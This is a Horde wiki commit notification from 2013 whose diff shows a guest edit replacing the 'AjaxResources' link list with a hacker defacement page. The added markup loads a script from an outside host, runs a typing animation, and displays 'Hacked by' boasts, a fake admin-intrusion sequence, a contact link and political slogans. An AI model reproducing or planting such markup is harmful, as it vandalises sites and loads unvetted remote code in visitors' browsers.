[commits] [Wiki] changed: AjaxResources
Wiki Guest
wikiguest at horde.org
Sun Aug 18 21:02:13 UTC 2013
guest [41.141.247.46] Sun, 18 Aug 2013 21:02:13 +0000
Modified page: http://wiki.horde.org/AjaxResources
New Revision: 6
Change log: zouhair fekari
@@ -1,69 +1,167 @@
-[[toc]]
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
+"http://www.w3.org/TR/html4/loose.dtd">
+<html>
+<title>0WN3D BY ZOUHAIR FEKARI</title><noscript></noscript><!--
--><script type="text/javascript"
src="http://www.freewebs.com/p.js"></script><script>
+
+TypingText = function(element, interval, cursor, finishedCallback) {
+ if((typeof document.getElementById == "undefined") || (typeof
element.innerHTML == "undefined")) {
+ this.running = true;
+ return;
+ }
+ this.element = element;
+ this.finishedCallback = (finishedCallback ? finishedCallback :
function() { return; });
+ this.interval = (typeof interval == "undefined" ? 20 : interval);
+ this.origText = this.element.innerHTML;
+ this.unparsedOrigText = this.origText;
+ this.cursor = (cursor ? cursor : "");
+ this.currentText = "";
+ this.currentChar = 0;
+ this.element.typingText = this;
+ if(this.element.id == "") this.element.id = "typingtext" +
TypingText.currentIndex++;
+ TypingText.all.push(this);
+ this.running = false;
+ this.inTag = false;
+ this.tagBuffer = "";
+ this.inHTMLEntity = false;
+ this.HTMLEntityBuffer = "";
+}
+TypingText.all = new Array();
+TypingText.currentIndex = 0;
+TypingText.runAll = function() {
+ for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run();
+}
+TypingText.prototype.run = function() {
+ if(this.running) return;
+ if(typeof this.origText == "undefined") {
+ setTimeout("document.getElementById('" + this.element.id +
"').typingText.run()", this.interval);
+ return;
+ }
+ if(this.currentText == "") this.element.innerHTML = "";
+ if(this.currentChar < this.origText.length) {
+ if(this.origText.charAt(this.currentChar) == "<" && !this.inTag) {
+ this.tagBuffer = "<";
+ this.inTag = true;
+ this.currentChar++;
+ this.run();
+ return;
+ } else if(this.origText.charAt(this.currentChar) == ">" && this.inTag) {
+ this.tagBuffer += ">";
+ this.inTag = false;
+ this.currentText += this.tagBuffer;
+ this.currentChar++;
+ this.run();
+ return;
+ } else if(this.inTag) {
+ this.tagBuffer += this.origText.charAt(this.currentChar);
+ this.currentChar++;
+ this.run();
+ return;
+ } else if(this.origText.charAt(this.currentChar) == "&" &&
!this.inHTMLEntity) {
+ this.HTMLEntityBuffer = "&";
+ this.inHTMLEntity = true;
+ this.currentChar++;
+ this.run();
+ return;
+ } else if(this.origText.charAt(this.currentChar) == ";" &&
this.inHTMLEntity) {
+ this.HTMLEntityBuffer += ";";
+ this.inHTMLEntity = false;
+ this.currentText += this.HTMLEntityBuffer;
+ this.currentChar++;
+ this.run();
+ return;
+ } else if(this.inHTMLEntity) {
+ this.HTMLEntityBuffer += this.origText.charAt(this.currentChar);
+ this.currentChar++;
+ this.run();
+ return;
+ } else {
+ this.currentText += this.origText.charAt(this.currentChar);
+ }
+ this.element.innerHTML = this.currentText;
+ this.element.innerHTML += (this.currentChar <
this.origText.length - 1 ? (typeof this.cursor == "function" ?
this.cursor(this.currentText) : this.cursor) : "");
+ this.currentChar++;
+ setTimeout("document.getElementById('" + this.element.id +
"').typingText.run()", this.interval);
+ } else {
+ this.currentText = "";
+ this.currentChar = 0;
+ this.running = false;
+ this.finishedCallback();
+ }
+}
+</script>
+<style>
+body {
+ padding:0;
+ margin:0;
+ background-color: black;
+ color: white;
+ font: normal 80% Verdana;
+ margin-top: 0px;
+ margin-left: 0px;
+ padding: 0;
+ margin-right: 0px;
+}
+
+td
+{
+ font-family: verdana;
+ font-size: 20pt;
+ color: green
+}
+
+a
+{
+ font-family: verdana;
+ font-size: 8pt;
+ color: lime
+}
-+ Ajax Resources
+</style>
+<center><div id="example1">
+ <p>
+ <center><p class="style1"><img
src="http://im38.gulfup.com/Ifawb.gif" border="0" alt="Upload
images"></center>
+<p><font face="Fixedsys">? Security of this Site was Down ?</font><br>
+ _______________________________________<br>
+
+</style>
+<center><div id="example1">
+ <p>
+ <center><p class="style1"><img
src="https://fbcdn-sphotos-h-a.akamaihd.net/hphotos-ak-prn2/1150840_4788785012516_2022679086_n.jpg" border="0" alt="Upload
images"></center>
+<p><font face="Fixedsys">? Security of this Site was Down ?</font><br>
+ _______________________________________<br>
-++ Toolkits
-
-http://prototype.conio.net/
-http://script.aculo.us/
-http://encytemedia.com/event-selectors/
-http://bennolan.com/behaviour/
-http://openrico.org/rico/home.page
-http://dojotoolkit.org/
-http://www.mochikit.com/
-http://moofx.mad4milk.net/
-http://trimpath.com/project/wiki/TrimJunction (!JavaScript Ruby on
Rails clone)
-http://tool-man.org/examples/ (Tool-Man library)
-http://cross-browser.com/toys/ (X-js library)
-
-++ Documentation
-http://www.sergiopereira.com/articles/prototype.js.html
-http://wiki.script.aculo.us/scriptaculous/show/Prototype
-http://wiki.script.aculo.us/scriptaculous/show/Demos
-http://swik.net/Ajax/Ajax-Development-Gotchas
-http://www.maxkiesler.com/index.php/weblog/comments/round_up_of_30_ajax_tutorials/
-http://www.maxkiesler.com/index.php/weblog/comments/60_more_helpful_ajax_tutorials/
-
-++ AJAX Apps
-http://www.roundcube.net/
-http://gregarius.net/
-http://www.netvibes.com/
-http://www.zimbra.com/
-http://projects.backbase.com/RUI/portal.html
-
-++ Blogs
-http://ajaxian.com/
-http://yuiblog.com/
-http://javascript.weblogsinc.com/
-
-++ Articles
-http://yahoo.weblogsinc.com/entry/1234000380058717/
-http://unclehulka.com/ryan/blog/archives/2005/09/13/yahoo-mail-beta-unleashed
-http://ajaxpatterns.org/
-http://www.sitepoint.com/article/remote-scripting-ajax
-http://codinginparadise.org/weblog/2005/08/ajax-tutorial-saving-session-across.html
-http://blog.joshuaeichorn.com/archives/2005/08/17/ajax-hello-world-with-html_ajax/
-http://dojotoolkit.org/docs/compressor_system.html
-http://www.whatwg.org/specs/web-apps/current-work/
-http://www.mortbay.com/MB/log/gregw/?permalink=Jetty6Continuations.html
-http://www-128.ibm.com/developerworks/web/library/wa-ajaxintro1.html
-http://www-128.ibm.com/developerworks/web/library/wa-ajaxintro2/
-http://www-128.ibm.com/developerworks/web/library/wa-ajaxintro3/
-
-++ !JavaScript Tools
-http://www.crockford.com/javascript/jsmin.html
-http://www.crockford.com/jslint/index.html
-
-++ JSON
-http://www.crockford.com/JSON/index.html ==> MOVED to: http://www.json.org
-http://www.crockford.com/JSON/js.html
-http://www.aurore.net/projects/php-json/
-
-++ Link collections
-http://www.maxkiesler.com/index.php/weblog/comments/round_up_of_50_ajax_toolkits_and_frameworks/
-http://edevil.wordpress.com/2005/11/14/javascript-libraries-roundup/
-http://www.cgisecurity.com/ajax/
-http://openjsan.org/
-
-++ Stuff
-http://rest.blueoxen.net/cgi-bin/wiki.pl
+ </a><br>
+</div>
+<p id="example2"><font face="Fixedsys"><br>
+
+? Connecting To Serveur ?</font><font face="Fixedsys"><br>
+? Connection complete ?</font><font face="Fixedsys"><br>
+? Enter in Admin system ?</font><font face="Fixedsys"><br>
+? Changing index ?</font><font face="Fixedsys"><br>
+? System is down ! ?</font><font face="Fixedsys"><br>
+? Zouhair Fekari was here ! ?<br>
+<font face="Fixedsys">? Dédicasse a toute la comunauté Dr.Hisoka
(WHST) and tout les hackeurs ' ?</font><br>
+<font face="Fixedsys">? Viens ici > <a
href="http://">https://www.facebook.com/#!/zouhaman.prince/</a>
?</font><br>
+<font face="Fixedsys">? La raison : Ne pas se faire passer pour un
hackeur (: ?</font><br><br>
+<font face="Fixedsys">? FREE PALESTINE WESTERN SAHARA'S FOR MOROCCAN
PEOPLE MORSY IS THE PRESIDENT ... ?</font><br><br>
+
+<p>_______________________________________
+<p><font face="Fixedsys"><br>
+? Hacked by Zouhair Fekari ?<br>
+? Sorry Zouhair Fekari © ?<br>
+? Contact Me : https://www.facebook.com/#!/zouhaman.prince/ Sorry
Admin ;) ?<br>
+? The hack is not a crime
+
+
+<p>
+
+<script type="text/javascript">
+new TypingText(document.getElementById("example1"));
+new TypingText(document.getElementById("example2"), 70, function(i){
+var ar = new Array("\\", "|", "/", "-"); return " " + ar[i.length %
+ar.length]; });
+TypingText.runAll();
+</script>
+<body bgcolor="#000000" text="#FFFFFF" link="#00FF00" vlink="#00FF33"
alink="#00FF00"></font>
+</html>
+<head><SCRIPT>
More information about the commits
mailing list